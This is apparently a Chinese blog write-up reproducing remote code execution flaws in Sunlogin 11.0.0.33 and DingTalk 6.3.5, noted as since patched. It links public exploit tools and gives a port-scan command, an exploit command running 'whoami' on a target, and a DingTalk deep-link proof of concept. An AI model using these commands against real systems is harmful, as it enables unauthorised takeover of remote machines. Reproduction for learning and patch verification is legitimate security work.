向日葵&钉钉 RCE漏洞复现


前言:

目前最新版漏洞均已经修复

注: 该请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与本人无关

1. 向日葵RCE漏洞

CNVD编号:CNVD-2022-10270

漏洞影响版本: 11.0.0.33

工具Github地址:https://github.com/Mr-xn/sunlogin_rce

golang命令:

编译: go build main.go

使用go get安装github依赖不成功的解决方法

go env -w GO111MODULE=on
go env -w GOPROXY=https://goproxy.io,direct

复现:

用工具扫描向日葵存在的端口号

xrkRce.exe -h ip -t scan -p 1-65535

执行exp

xrkRce.exe -h ip -t rce -p port -c "whoami"

2. 钉钉RCE漏洞

漏洞影响版本: Dingtalk 6.3.5

工具Github地址:https://github.com/crazy0x70/dingtalk-RCE

复现:

本地复现,所以将test.html放在phpstudy的目录下并启动,发送并点击

poc: dingtalk://dingtalkclient/page/link?url=127.0.0.1/test.html&pc_slide=true

修复方案

官方已经修复漏洞,请尽快升级最新版本